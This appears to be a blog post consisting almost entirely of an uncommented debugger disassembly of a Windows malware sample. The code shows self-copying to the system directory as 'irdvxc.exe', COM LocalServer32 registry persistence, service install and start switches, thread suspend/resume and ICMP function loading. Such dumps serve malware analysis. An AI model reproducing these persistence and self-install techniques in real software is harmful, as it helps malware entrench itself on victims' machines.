00347B33 C745 F0 01000000 MOV DWORD PTR SS:[EBP-10],1

00347B3A 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]

00347B3D FF36 PUSH DWORD PTR DS:[ESI]

00347B3F 8F45 FC POP DWORD PTR SS:[EBP-4]

00347B42 FF76 08 PUSH DWORD PTR DS:[ESI+8]

00347B45 8F45 F8 POP DWORD PTR SS:[EBP-8]

00347B48 FF76 04 PUSH DWORD PTR DS:[ESI+4]

00347B4B 8F45 F4 POP DWORD PTR SS:[EBP-C]

00347B4E FF75 08 PUSH DWORD PTR SS:[EBP+8]

00347B51 E8 66070000 CALL 003482BC ; JMP to ole32.CoTaskMemFree

00347B56 68 80EE3600 PUSH 36EE80

00347B5B FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347B5E E8 F3060000 CALL 00348256 ; JMP to kernel32.WaitForSingleObject

00347B63 837D F0 00 CMP DWORD PTR SS:[EBP-10],0

00347B67 75 19 JNZ SHORT 00347B82

00347B69 FF75 F8 PUSH DWORD PTR SS:[EBP-8]

00347B6C E8 9D060000 CALL 0034820E ; JMP to kernel32.ResumeThread

00347B71 FF75 F4 PUSH DWORD PTR SS:[EBP-C]

00347B74 E8 BF060000 CALL 00348238 ; JMP to kernel32.SuspendThread

00347B79 C745 F0 01000000 MOV DWORD PTR SS:[EBP-10],1

00347B80 EB 1D JMP SHORT 00347B9F

00347B82 837D F0 01 CMP DWORD PTR SS:[EBP-10],1

00347B86 75 17 JNZ SHORT 00347B9F

00347B88 FF75 F4 PUSH DWORD PTR SS:[EBP-C]

00347B8B E8 7E060000 CALL 0034820E ; JMP to kernel32.ResumeThread

00347B90 FF75 F8 PUSH DWORD PTR SS:[EBP-8]

00347B93 E8 A0060000 CALL 00348238 ; JMP to kernel32.SuspendThread

00347B98 C745 F0 00000000 MOV DWORD PTR SS:[EBP-10],0

00347B9F ^EB B5 JMP SHORT 00347B56

00347BA1 5B POP EBX

00347BA2 5E POP ESI

00347BA3 5F POP EDI

00347BA4 C9 LEAVE

00347BA5 C2 0400 RETN 4

00347BA8 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347BAF 90 NOP

00347BB0 55 PUSH EBP

00347BB1 8BEC MOV EBP,ESP

00347BB3 57 PUSH EDI

00347BB4 56 PUSH ESI

00347BB5 53 PUSH EBX

00347BB6 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]

00347BB9 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C]

00347BBC 893D 3EB73500 MOV DWORD PTR DS:[35B73E],EDI

00347BC2 83C5 04 ADD EBP,4

00347BC5 BB FFFFFFFF MOV EBX,-1

00347BCA 68 00040000 PUSH 400

00347BCF 57 PUSH EDI

00347BD0 E8 09060000 CALL 003481DE ; JMP to kernel32.IsBadReadPtr

00347BD5 0BC0 OR EAX,EAX

00347BD7 75 20 JNZ SHORT 00347BF9

00347BD9 66:813F 4D5A CMP WORD PTR DS:[EDI],5A4D

00347BDE 75 19 JNZ SHORT 00347BF9

00347BE0 037F 3C ADD EDI,DWORD PTR DS:[EDI+3C]

00347BE3 813F 50450000 CMP DWORD PTR DS:[EDI],4550

00347BE9 75 0E JNZ SHORT 00347BF9

00347BEB 0FB74F 16 MOVZX ECX,WORD PTR DS:[EDI+16]

00347BEF F7C1 00200000 TEST ECX,2000

00347BF5 74 02 JE SHORT 00347BF9

00347BF7 33DB XOR EBX,EBX

00347BF9 0BDB OR EBX,EBX

00347BFB 75 1D JNZ SHORT 00347C1A

00347BFD E8 1E9DFFFF CALL 00341920

00347C02 83FE 01 CMP ESI,1

00347C05 75 0C JNZ SHORT 00347C13

00347C07 B8 01000000 MOV EAX,1

00347C0C 5B POP EBX

00347C0D 5E POP ESI

00347C0E 5F POP EDI

00347C0F C9 LEAVE

00347C10 C2 0C00 RETN 0C

00347C13 5B POP EBX

00347C14 5E POP ESI

00347C15 5F POP EDI

00347C16 C9 LEAVE

00347C17 C2 0C00 RETN 0C

00347C1A 83ED 04 SUB EBP,4

00347C1D 5B POP EBX

00347C1E 5E POP ESI

00347C1F 5F POP EDI

00347C20 C9 LEAVE

00347C21 C2 0C00 RETN 0C

00347C24 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347C2B 05 00000000 ADD EAX,0

00347C30 55 PUSH EBP

00347C31 8BEC MOV EBP,ESP

00347C33 81C4 80FEFFFF ADD ESP,-180

00347C39 57 PUSH EDI

00347C3A 56 PUSH ESI

00347C3B 53 PUSH EBX

00347C3C 6A 00 PUSH 0

00347C3E E8 67060000 CALL 003482AA ; JMP to ole32.CoInitialize

00347C43 68 189E3500 PUSH 359E18

00347C48 E8 33590000 CALL 0034D580

00347C4D A3 08BB3500 MOV DWORD PTR DS:[35BB08],EAX

00347C52 68 0CBB3500 PUSH 35BB0C

00347C57 6A 01 PUSH 1

00347C59 6A 04 PUSH 4

00347C5B FF35 08BB3500 PUSH DWORD PTR DS:[35BB08]

00347C61 68 4AB73500 PUSH 35B74A

00347C66 E8 45060000 CALL 003482B0 ; JMP to ole32.CoRegisterClassObject

00347C6B 68 2C010000 PUSH 12C

00347C70 8D85 80FEFFFF LEA EAX,DWORD PTR SS:[EBP-180]

00347C76 50 PUSH EAX

00347C77 6A 00 PUSH 0

00347C79 E8 2A050000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347C7E 33C0 XOR EAX,EAX

00347C80 8D7D AC LEA EDI,DWORD PTR SS:[EBP-54]

00347C83 B9 44000000 MOV ECX,44

00347C88 F3:AA REP STOS BYTE PTR ES:[EDI]

00347C8A C745 AC 44000000 MOV DWORD PTR SS:[EBP-54],44

00347C91 33D2 XOR EDX,EDX

00347C93 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]

00347C96 50 PUSH EAX

00347C97 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]

00347C9A 50 PUSH EAX

00347C9B 52 PUSH EDX

00347C9C 52 PUSH EDX

00347C9D 52 PUSH EDX

00347C9E 52 PUSH EDX

00347C9F 52 PUSH EDX

00347CA0 52 PUSH EDX

00347CA1 8D85 80FEFFFF LEA EAX,DWORD PTR SS:[EBP-180]

00347CA7 50 PUSH EAX

00347CA8 52 PUSH EDX

00347CA9 E8 94040000 CALL 00348142 ; JMP to kernel32.CreateProcessA

00347CAE 6A 00 PUSH 0

00347CB0 E8 A5040000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347CB5 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347CBC 8D6424 00 LEA ESP,DWORD PTR SS:[ESP]

00347CC0 55 PUSH EBP

00347CC1 8BEC MOV EBP,ESP

00347CC3 81C4 70FEFFFF ADD ESP,-190

00347CC9 57 PUSH EDI

00347CCA 56 PUSH ESI

00347CCB 53 PUSH EBX

00347CCC 6A 00 PUSH 0

00347CCE 6A 64 PUSH 64

00347CD0 8D85 70FEFFFF LEA EAX,DWORD PTR SS:[EBP-190]

00347CD6 50 PUSH EAX

00347CD7 E8 F8060000 CALL 003483D4

00347CDC 6A 00 PUSH 0

00347CDE 68 2C010000 PUSH 12C

00347CE3 8D85 D4FEFFFF LEA EAX,DWORD PTR SS:[EBP-12C]

00347CE9 50 PUSH EAX

00347CEA E8 E5060000 CALL 003483D4

00347CEF 68 2C010000 PUSH 12C

00347CF4 8D85 D4FEFFFF LEA EAX,DWORD PTR SS:[EBP-12C]

00347CFA 50 PUSH EAX

00347CFB 6A 00 PUSH 0

00347CFD E8 A6040000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347D02 BA 64000000 MOV EDX,64

00347D07 8D8D D4FEFFFF LEA ECX,DWORD PTR SS:[EBP-12C]

00347D0D 8D05 4AB73500 LEA EAX,DWORD PTR DS:[35B74A]

00347D13 50 PUSH EAX

00347D14 E8 77120000 CALL 00348F90

00347D19 68 7AB73500 PUSH 35B77A ; ASCII “{3ED2D4F1-8C31-030B-F817-29B6C522E670}”

00347D1E 68 57453500 PUSH 354557 ; ASCII “{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}”

00347D23 68 4AB73500 PUSH 35B74A

00347D28 E8 B3A7FFFF CALL 003424E0

00347D2D 8D85 70FEFFFF LEA EAX,DWORD PTR SS:[EBP-190]

00347D33 50 PUSH EAX

00347D34 E8 C7A9FFFF CALL 00342700

00347D39 8D85 70FEFFFF LEA EAX,DWORD PTR SS:[EBP-190]

00347D3F 50 PUSH EAX

00347D40 68 37453500 PUSH 354537 ; ASCII “CLSID\%s”

00347D45 68 7AB73500 PUSH 35B77A ; ASCII “{3ED2D4F1-8C31-030B-F817-29B6C522E670}”

00347D4A 68 00000080 PUSH 80000000

00347D4F E8 1CA7FFFF CALL 00342470

00347D54 8D85 D4FEFFFF LEA EAX,DWORD PTR SS:[EBP-12C]

00347D5A 50 PUSH EAX

00347D5B 68 40453500 PUSH 354540 ; ASCII “CLSID\%s\LocalServer32”

00347D60 68 7AB73500 PUSH 35B77A ; ASCII “{3ED2D4F1-8C31-030B-F817-29B6C522E670}”

00347D65 68 00000080 PUSH 80000000

00347D6A E8 01A7FFFF CALL 00342470

00347D6F 5B POP EBX

00347D70 5E POP ESI

00347D71 5F POP EDI

00347D72 C9 LEAVE

00347D73 C3 RETN

00347D74 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347D7B 05 00000000 ADD EAX,0

00347D80 55 PUSH EBP

00347D81 8BEC MOV EBP,ESP

00347D83 81C4 44FDFFFF ADD ESP,-2BC

00347D89 57 PUSH EDI

00347D8A 56 PUSH ESI

00347D8B 53 PUSH EBX

00347D8C 33DB XOR EBX,EBX

00347D8E 68 F4010000 PUSH 1F4

00347D93 E8 9A040000 CALL 00348232 ; JMP to kernel32.Sleep

00347D98 8D85 44FDFFFF LEA EAX,DWORD PTR SS:[EBP-2BC]

00347D9E 50 PUSH EAX

00347D9F 68 A4473500 PUSH 3547A4 ; ASCII “patch:”

00347DA4 E8 5792FFFF CALL 00341000

00347DA9 83F8 01 CMP EAX,1

00347DAC 75 0D JNZ SHORT 00347DBB

00347DAE 8D85 44FDFFFF LEA EAX,DWORD PTR SS:[EBP-2BC]

00347DB4 50 PUSH EAX

00347DB5 E8 94030000 CALL 0034814E ; JMP to kernel32.DeleteFileA

00347DBA 43 INC EBX

00347DBB 8BC3 MOV EAX,EBX

00347DBD 5B POP EBX

00347DBE 5E POP ESI

00347DBF 5F POP EDI

00347DC0 C9 LEAVE

00347DC1 C3 RETN

00347DC2 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347DC9 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347DD0 55 PUSH EBP

00347DD1 8BEC MOV EBP,ESP

00347DD3 83C4 FC ADD ESP,-4

00347DD6 6A 00 PUSH 0

00347DD8 68 80000000 PUSH 80

00347DDD 6A 03 PUSH 3

00347DDF 6A 00 PUSH 0

00347DE1 6A 01 PUSH 1

00347DE3 68 00000080 PUSH 80000000

00347DE8 FF75 08 PUSH DWORD PTR SS:[EBP+8]

00347DEB E8 40030000 CALL 00348130 ; JMP to kernel32.CreateFileA

00347DF0 8945 FC MOV DWORD PTR SS:[EBP-4],EAX

00347DF3 83F8 FF CMP EAX,-1

00347DF6 74 41 JE SHORT 00347E39

00347DF8 6A 00 PUSH 0

00347DFA FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347DFD E8 94030000 CALL 00348196 ; JMP to kernel32.GetFileSize

00347E02 8BD8 MOV EBX,EAX

00347E04 53 PUSH EBX

00347E05 E8 AC040000 CALL 003482B6 ; JMP to ole32.CoTaskMemAlloc

00347E0A 0BC0 OR EAX,EAX

00347E0C 74 2B JE SHORT 00347E39

00347E0E 8BF8 MOV EDI,EAX

00347E10 0BC0 OR EAX,EAX

00347E12 74 25 JE SHORT 00347E39

00347E14 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]

00347E17 8939 MOV DWORD PTR DS:[ECX],EDI

00347E19 6A 00 PUSH 0

00347E1B 54 PUSH ESP

00347E1C 53 PUSH EBX

00347E1D 57 PUSH EDI

00347E1E FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347E21 E8 E2030000 CALL 00348208 ; JMP to kernel32.ReadFile

00347E26 FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347E29 E8 F0020000 CALL 0034811E ; JMP to kernel32.CloseHandle

00347E2E 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]

00347E31 8919 MOV DWORD PTR DS:[ECX],EBX

00347E33 33C0 XOR EAX,EAX

00347E35 C9 LEAVE

00347E36 C2 0C00 RETN 0C

00347E39 B8 FFFFFFFF MOV EAX,-1

00347E3E C9 LEAVE

00347E3F C2 0C00 RETN 0C

00347E42 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347E49 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347E50 57 PUSH EDI

00347E51 56 PUSH ESI

00347E52 53 PUSH EBX

00347E53 68 58020000 PUSH 258

00347E58 68 AAB03500 PUSH 35B0AA ; ASCII “C:\Documents and Settings\norman\Desktopafa3b27802d2ab6a751248dbe32cb62.exe”

00347E5D 6A 00 PUSH 0

00347E5F E8 44030000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347E64 C705 58BC3500 00>MOV DWORD PTR DS:[35BC58],0

00347E6E 68 484A3500 PUSH 354A48 ; ASCII “icmp.dll”

00347E73 E8 72030000 CALL 003481EA ; JMP to kernel32.LoadLibraryA

00347E78 8BF0 MOV ESI,EAX

00347E7A 0BF6 OR ESI,ESI

00347E7C 74 5A JE SHORT 00347ED8

00347E7E 68 514A3500 PUSH 354A51 ; ASCII “IcmpCreateFile”

00347E83 56 PUSH ESI

00347E84 E8 2B030000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347E89 0BC0 OR EAX,EAX

00347E8B 74 4B JE SHORT 00347ED8

00347E8D A3 48BC3500 MOV DWORD PTR DS:[35BC48],EAX

00347E92 68 604A3500 PUSH 354A60 ; ASCII “IcmpSendEcho”

00347E97 56 PUSH ESI

00347E98 E8 17030000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347E9D 0BC0 OR EAX,EAX

00347E9F 74 37 JE SHORT 00347ED8

00347EA1 A3 4CBC3500 MOV DWORD PTR DS:[35BC4C],EAX

00347EA6 68 6D4A3500 PUSH 354A6D ; ASCII “IcmpParseReplies”

00347EAB 56 PUSH ESI

00347EAC E8 03030000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347EB1 0BC0 OR EAX,EAX

00347EB3 74 23 JE SHORT 00347ED8

00347EB5 A3 50BC3500 MOV DWORD PTR DS:[35BC50],EAX

00347EBA 68 7E4A3500 PUSH 354A7E ; ASCII “IcmpCloseHandle”

00347EBF 56 PUSH ESI

00347EC0 E8 EF020000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347EC5 0BC0 OR EAX,EAX

00347EC7 74 0F JE SHORT 00347ED8

00347EC9 A3 54BC3500 MOV DWORD PTR DS:[35BC54],EAX

00347ECE C705 58BC3500 01>MOV DWORD PTR DS:[35BC58],1

00347ED8 68 36AE3500 PUSH 35AE36

00347EDD E8 EA020000 CALL 003481CC ; JMP to kernel32.InitializeCriticalSection

00347EE2 68 1EAE3500 PUSH 35AE1E

00347EE7 E8 E0020000 CALL 003481CC ; JMP to kernel32.InitializeCriticalSection

00347EEC 5B POP EBX

00347EED 5E POP ESI

00347EEE 5F POP EDI

00347EEF C3 RETN

00347EF0 55 PUSH EBP

00347EF1 8BEC MOV EBP,ESP

00347EF3 81C4 5CF9FFFF ADD ESP,-6A4

00347EF9 57 PUSH EDI

00347EFA 56 PUSH ESI

00347EFB 53 PUSH EBX

00347EFC 68 2C010000 PUSH 12C

00347F01 8D85 7CFCFFFF LEA EAX,DWORD PTR SS:[EBP-384]

00347F07 50 PUSH EAX

00347F08 6A 00 PUSH 0

00347F0A E8 99020000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347F0F 8D95 7CFCFFFF LEA EDX,DWORD PTR SS:[EBP-384]

00347F15 48 DEC EAX

00347F16 807C10 FC 5C CMP BYTE PTR DS:[EAX+EDX-4],5C

00347F1B 0F85 BB000000 JNZ 00347FDC

00347F21 68 58020000 PUSH 258

00347F26 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F2C 50 PUSH EAX

00347F2D E8 88020000 CALL 003481BA ; JMP to kernel32.GetSystemDirectoryA

00347F32 8D95 A8FDFFFF LEA EDX,DWORD PTR SS:[EBP-258]

00347F38 807C10 FF 5C CMP BYTE PTR DS:[EAX+EDX-1],5C

00347F3D 74 06 JE SHORT 00347F45

00347F3F 66:C70410 5C00 MOV WORD PTR DS:[EAX+EDX],5C

00347F45 68 02453500 PUSH 354502 ; ASCII “irdvxc.exe ”

00347F4A 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F50 50 PUSH EAX

00347F51 E8 12030000 CALL 00348268 ; JMP to kernel32.lstrcatA

00347F56 6A 00 PUSH 0

00347F58 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F5E 50 PUSH EAX

00347F5F 8D85 7CFCFFFF LEA EAX,DWORD PTR SS:[EBP-384]

00347F65 50 PUSH EAX

00347F66 E8 B9010000 CALL 00348124 ; JMP to kernel32.CopyFileA

00347F6B 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F71 50 PUSH EAX

00347F72 8D85 ECFAFFFF LEA EAX,DWORD PTR SS:[EBP-514]

00347F78 50 PUSH EAX

00347F79 E8 FC020000 CALL 0034827A ; JMP to kernel32.lstrcpyA

00347F7E 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F84 50 PUSH EAX

00347F85 8D85 5CF9FFFF LEA EAX,DWORD PTR SS:[EBP-6A4]

00347F8B 50 PUSH EAX

00347F8C E8 E9020000 CALL 0034827A ; JMP to kernel32.lstrcpyA

00347F91 68 14473500 PUSH 354714 ; ASCII “/installservice”

00347F96 8D85 ECFAFFFF LEA EAX,DWORD PTR SS:[EBP-514]

00347F9C 50 PUSH EAX

00347F9D E8 C6020000 CALL 00348268 ; JMP to kernel32.lstrcatA

00347FA2 68 0D473500 PUSH 35470D ; ASCII “/start”

00347FA7 8D85 5CF9FFFF LEA EAX,DWORD PTR SS:[EBP-6A4]

00347FAD 50 PUSH EAX

00347FAE E8 B5020000 CALL 00348268 ; JMP to kernel32.lstrcatA

00347FB3 8D85 ECFAFFFF LEA EAX,DWORD PTR SS:[EBP-514]

00347FB9 50 PUSH EAX

00347FBA E8 31000000 CALL 00347FF0

00347FBF 68 D0070000 PUSH 7D0

00347FC4 E8 69020000 CALL 00348232 ; JMP to kernel32.Sleep

00347FC9 8D85 5CF9FFFF LEA EAX,DWORD PTR SS:[EBP-6A4]

00347FCF 50 PUSH EAX

00347FD0 E8 1B000000 CALL 00347FF0

00347FD5 6A 00 PUSH 0

00347FD7 E8 7E010000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347FDC 5B POP EBX

00347FDD 5E POP ESI

00347FDE 5F POP EDI

00347FDF C9 LEAVE

00347FE0 C3 RETN

00347FE1 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347FE8 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347FEF 90 NOP

00347FF0 55 PUSH EBP

00347FF1 8BEC MOV EBP,ESP

00347FF3 83C4 AC ADD ESP,-54

00347FF6 57 PUSH EDI

00347FF7 56 PUSH ESI

00347FF8 53 PUSH EBX

00347FF9 33C0 XOR EAX,EAX

00347FFB 8D7D AC LEA EDI,DWORD PTR SS:[EBP-54]

00347FFE B9 44000000 MOV ECX,44

00348003 F3:AA REP STOS BYTE PTR ES:[EDI]

00348005 C745 AC 44000000 MOV DWORD PTR SS:[EBP-54],44

0034800C 33D2 XOR EDX,EDX

0034800E 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]

00348011 50 PUSH EAX

00348012 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]

00348015 50 PUSH EAX

00348016 52 PUSH EDX

00348017 52 PUSH EDX

00348018 52 PUSH EDX

00348019 52 PUSH EDX

0034801A 52 PUSH EDX

0034801B 52 PUSH EDX

0034801C FF75 08 PUSH DWORD PTR SS:[EBP+8]

0034801F 52 PUSH EDX

00348020 E8 1D010000 CALL 00348142 ; JMP to kernel32.CreateProcessA

00348025 8BF8 MOV EDI,EAX

00348027 FF75 F0 PUSH DWORD PTR SS:[EBP-10]

0034802A E8 EF000000 CALL 0034811E ; JMP to kernel32.CloseHandle

0034802F FF75 F4 PUSH DWORD PTR SS:[EBP-C]

00348032 E8 E7000000 CALL 0034811E ; JMP to kernel32.CloseHandle

00348037 8BF8 MOV EDI,EAX

00348039 5B POP EBX

0034803A 5E POP ESI

0034803B 5F POP EDI

0034803C C9 LEAVE

0034803D C2 0400 RETN 4

00348040 55 PUSH EBP

00348041 8BEC MOV EBP,ESP

00348043 81C4 F8FBFFFF ADD ESP,-408

00348049 53 PUSH EBX

0034804A 56 PUSH ESI

0034804B 57 PUSH EDI

0034804C C785 F8FBFFFF 00>MOV DWORD PTR SS:[EBP-408],0

00348056 8B5D 18 MOV EBX,DWORD PTR SS:[EBP+18]

00348059 83FB 01 CMP EBX,1

0034805C 7F 0A JG SHORT 00348068

0034805E B8 FEFFFFFF MOV EAX,-2

00348063 E9 A2000000 JMP 0034810A

00348068 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C]

0034806B 0375 10 ADD ESI,DWORD PTR SS:[EBP+10]

0034806E 2BF3 SUB ESI,EBX

00348070 8BD6 MOV EDX,ESI

00348072 B9 00010000 MOV ECX,100

00348077 8BC3 MOV EAX,EBX

00348079 8DBD FCFBFFFF LEA EDI,DWORD PTR SS:[EBP-404]

0034807F F3:AB REP STOS DWORD PTR ES:[EDI]

00348081 8BCB MOV ECX,EBX

00348083 49 DEC ECX

00348084 8B75 14 MOV ESI,DWORD PTR SS:[EBP+14]

00348087 8DBD FCFBFFFF LEA EDI,DWORD PTR SS:[EBP-404]

0034808D 33C0 XOR EAX,EAX

0034808F 8A06 MOV AL,BYTE PTR DS:[ESI]

00348091 46 INC ESI

00348092 890C87 MOV DWORD PTR DS:[EDI+EAX*4],ECX

00348095 49 DEC ECX

00348096 ^75 F7 JNZ SHORT 0034808F

00348098 8BCB MOV ECX,EBX

0034809A 49 DEC ECX

0034809B 894D FC MOV DWORD PTR SS:[EBP-4],ECX

0034809E 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C]

003480A1 8B7D 14 MOV EDI,DWORD PTR SS:[EBP+14]

003480A4 0375 08 ADD ESI,DWORD PTR SS:[EBP+8]

003480A7 EB 15 JMP SHORT 003480BE

003480A9 03C1 ADD EAX,ECX

003480AB 2B45 FC SUB EAX,DWORD PTR SS:[EBP-4]

003480AE 79 05 JNS SHORT 003480B5

003480B0 B8 01000000 MOV EAX,1

003480B5 03F0 ADD ESI,EAX

003480B7 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]

003480BA 3BD6 CMP EDX,ESI

003480BC 7C 46 JL SHORT 00348104

003480BE 33C0 XOR EAX,EAX

003480C0 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]

003480C3 3A0439 CMP AL,BYTE PTR DS:[ECX+EDI]

003480C6 74 11 JE SHORT 003480D9

003480C8 8B8485 FCFBFFFF MOV EAX,DWORD PTR SS:[EBP+EAX*4-404]

003480CF 3BD8 CMP EBX,EAX

003480D1 ^75 E2 JNZ SHORT 003480B5

003480D3 8D7431 01 LEA ESI,DWORD PTR DS:[ECX+ESI+1]

003480D7 ^EB E1 JMP SHORT 003480BA

003480D9 49 DEC ECX

003480DA 33C0 XOR EAX,EAX

003480DC 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]

003480DF 3A0439 CMP AL,BYTE PTR DS:[ECX+EDI]

003480E2 75 0F JNZ SHORT 003480F3

003480E4 49 DEC ECX

003480E5 ^79 F5 JNS SHORT 003480DC

003480E7 FF85 F8FBFFFF INC DWORD PTR SS:[EBP-408]

003480ED 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]

003480F0 46 INC ESI

003480F1 ^EB CB JMP SHORT 003480BE

003480F3 8B8485 FCFBFFFF MOV EAX,DWORD PTR SS:[EBP+EAX*4-404]

003480FA 3BD8 CMP EBX,EAX

003480FC ^75 AB JNZ SHORT 003480A9

003480FE 8D7431 01 LEA ESI,DWORD PTR DS:[ECX+ESI+1]

00348102 ^EB B6 JMP SHORT 003480BA

00348104 8B85 F8FBFFFF MOV EAX,DWORD PTR SS:[EBP-408]

0034810A 5F POP EDI

0034810B 5E POP ESI

0034810C 5B POP EBX

0034810D C9 LEAVE

0034810E C2 1400 RETN 14

00348111 CC INT3

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s